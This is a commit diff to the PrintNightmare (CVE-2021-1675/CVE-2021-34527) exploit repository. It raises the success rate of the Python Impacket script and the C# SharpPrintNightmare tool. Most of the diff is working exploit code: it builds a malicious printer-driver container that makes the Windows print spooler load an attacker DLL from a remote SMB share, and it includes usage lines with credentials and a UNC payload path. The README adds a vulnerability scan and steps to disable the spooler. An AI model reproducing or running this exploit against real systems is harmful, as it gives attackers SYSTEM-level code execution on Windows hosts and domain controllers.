C# success rate and PoC improvement

Signed-off-by: cube0x0 <vidfelt@protonmail.com>
2024-11-13 01:27:57 +00:00 · 2021-07-03 13:53:46 +02:00 · 2021-07-03 13:53:46 +02:00 · 2180daa238
commit 2180daa238
parent c6bb4923d8
6 changed files with 51 additions and 37 deletions
--- a/CVE-2021-1675.py
+++ b/CVE-2021-1675.py
@ -5,7 +5,6 @@ from impacket.dcerpc.v5.dtypes import NULL
 from impacket.structure import Structure
 import argparse
 import sys
-import time
 import pathlib

 #https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030
@ -67,23 +66,7 @@ def getDrivers(dce, handle=NULL):
    return blob


-def main(username, password, domain, lmhash, nthash, address, port, share):
-    #connect
-    dce = connect(username, password, domain, lmhash, nthash, address, port)
-    #handle = "\\\\{0}\x00".format(address)
-    handle = NULL
-
-    #find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
-    try:
-        blob = getDrivers(dce, handle)
-        pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL'
-    except Exception as e:
-        print('[-] Failed to enumerate remote pDriverPath')
-        print(str(e))
-        sys.exit(1)
-
-    print("[+] pDriverPath Found {0}".format(pDriverPath))
-
+def main(dce, pDriverPath, share):
    #build DRIVER_CONTAINER package
    container_info = rprn.DRIVER_CONTAINER()
    container_info['Level'] = 2
@ -93,14 +76,15 @@ def main(username, password, domain, lmhash, nthash, address, port, share):
    container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
    container_info['DriverInfo']['Level2']['pDriverPath']  = pDriverPath + '\x00'
    container_info['DriverInfo']['Level2']['pDataFile']    = "{0}\x00".format(share)
-    container_info['DriverInfo']['Level2']['pConfigFile']  = "C:\\Windows\\System32\\kernelbase.dll\x00"
-
+    container_info['DriverInfo']['Level2']['pConfigFile']  = "C:\\Windows\\System32\\winhttp.dll\x00"
+    
    flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
    filename = share.split("\\")[-1]
-    print("[*] Executing {0}".format(share))

    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
    print("[*] Stage0: {0}".format(resp['ErrorCode']))
+
+    container_info['DriverInfo']['Level2']['pConfigFile']  = "C:\\Windows\\System32\\kernelbase.dll\x00"
    for i in range(1, 30):
        try:
            container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
@ -118,9 +102,11 @@ if __name__ == '__main__':
    parser = argparse.ArgumentParser(add_help = True, description = "CVE-2021-1675 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog="""
 Example;
 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll'
+./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL'
    """)
    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
    parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'')
+    parser.add_argument('pDriverPath', action='store', help='Driver path. Example \'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\'', nargs="?")
    group = parser.add_argument_group('authentication')
    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    group = parser.add_argument_group('connection')
@ -161,12 +147,34 @@ Example;
        lmhash = ''
        nthash = ''

+    #connect
+    dce = connect(username, password, domain, lmhash, nthash, options.target_ip, options.port)
+    #handle = "\\\\{0}\x00".format(address)
+    handle = NULL
+
+    #find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
+    if not options.pDriverPath:
+        try:
+            blob = getDrivers(dce, handle)
+            pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL'
+            if not "filerepository" in pDriverPath:
+                print("[-] pDriverPath {0}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....".format(pDriverPath))
+                print("[-] Specify pDriverPath manually")
+                sys.exit(1)
+        except Exception as e:
+            print('[-] Failed to enumerate remote pDriverPath')
+            print(str(e))
+            sys.exit(1)
+    else:
+        pDriverPath = options.pDriverPath
+
+    print("[+] pDriverPath Found {0}".format(pDriverPath))
+    print("[*] Executing {0}".format(options.share))
+
    #re-run if stage0/stageX fails
    print("[*] Try 1...")
-    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
-    time.sleep(10)
+    main(dce, pDriverPath, options.share)
    print("[*] Try 2...")
-    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
-    time.sleep(10)
+    main(dce, pDriverPath,options.share)
    print("[*] Try 3...")
-    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
+    main(dce, pDriverPath,options.share)
--- a/README.md
+++ b/README.md
@ -1,4 +1,4 @@
-# CVE-2021-1675
+# CVE-2021-1675 / CVE-2021-34527

 Impacket implementation of the [PrintNightmare ](https://github.com/afwu/PrintNightmare) PoC originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370)

@ -86,9 +86,9 @@ REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_

 ### Scanning

-We can use `rpcdump.py` from impacket to scan for vulnerable hosts, if it returns a value, it's vulnerable 
+We can use `rpcdump.py` from impacket to scan for potential vulnerable hosts, if it returns a value, it could be vulnerable 

-```
+```bash
 rpcdump.py @192.168.1.10 | grep MS-RPRN

 Protocol: [MS-RPRN]: Print System Remote Protocol
@ -100,7 +100,7 @@ Disable Spooler service

 ```powershell
 Stop-Service Spooler
-REG ADD  "HKLM\SYSTEM\CurrentControlSet\Services\Spooler"  /v "Start " /t REG_DWORD /d "4" /f
+REG ADD  "HKLM\SYSTEM\CurrentControlSet\Services\Spooler"  /v "Start" /t REG_DWORD /d "4" /f
 ```

 Or Uninstall Print-Services
--- a/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo
+++ b/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo
--- a/SharpPrintNightmare/README.md
+++ b/SharpPrintNightmare/README.md
@ -1,7 +1,9 @@
-# C# Implementation of CVE-2021-1675
+# C# Implementation of CVE-2021-1675 / CVE-2021-34527

 ### Usage

+The RCE functionality might need to be executed with local administrator privileges on YOUR machine.
+
 ```
 #LPE
 C:\SharpPrintNightmare.exe C:\addCube.dll
--- a/SharpPrintNightmare/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo
+++ b/SharpPrintNightmare/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo
--- a/SharpPrintNightmare/SharpPrintNightmare/Program.cs
+++ b/SharpPrintNightmare/SharpPrintNightmare/Program.cs
@ -82,13 +82,17 @@ namespace SharpPrintNightmare
                        break;
                    }
                }
-                //lucky shot
+                //could not find driver path
                if (pDriverPath == "")
                {
-                    pDriverPath = drivers[0].pDriverPath;
+                    Console.WriteLine($"[-] [-] pDriverPath {pDriverPath}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....");
+                    Console.WriteLine($"[-] Specify pDriverPath manually");
+                    Environment.Exit(1);
                }
-                pDriverPath = Directory.GetParent(pDriverPath).FullName + "\\UNIDRV.DLL";
            }
+            Console.WriteLine($"[*] pDriverPath {pDriverPath}");
+            Console.WriteLine($"[*] Executing {dllpath}");
+
            if (args.Length > 2)
            {
                path = args[2];
@ -117,13 +121,11 @@ namespace SharpPrintNightmare

            //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug
            //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug
-            Console.WriteLine($"[*] pDriverPath {pDriverPath}");
-            Console.WriteLine($"[*] Executing {dllpath}");

            //DRIVER_INFO_2 Level2 = drivers[0]; // debug
            DRIVER_INFO_2 Level2 = new DRIVER_INFO_2();
            Level2.cVersion = 3;
-            Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
+            Level2.pConfigFile = "C:\\Windows\\System32\\winhttp.dll"; //replace kernelbase with winhttp
            Level2.pDataFile = dllpath;
            Level2.pDriverPath = pDriverPath;
            Level2.pEnvironment = "Windows x64";
@ -141,6 +143,8 @@ namespace SharpPrintNightmare
            Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error());
            Marshal.FreeHGlobal(pnt);

+            //Specify a dll that does not exists in C:\\Windows\\System32\\spool\\drivers\\x64\\3\\
+            Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
            for (int i = 1; i <= 30; i++)
            {
                //add path to our exploit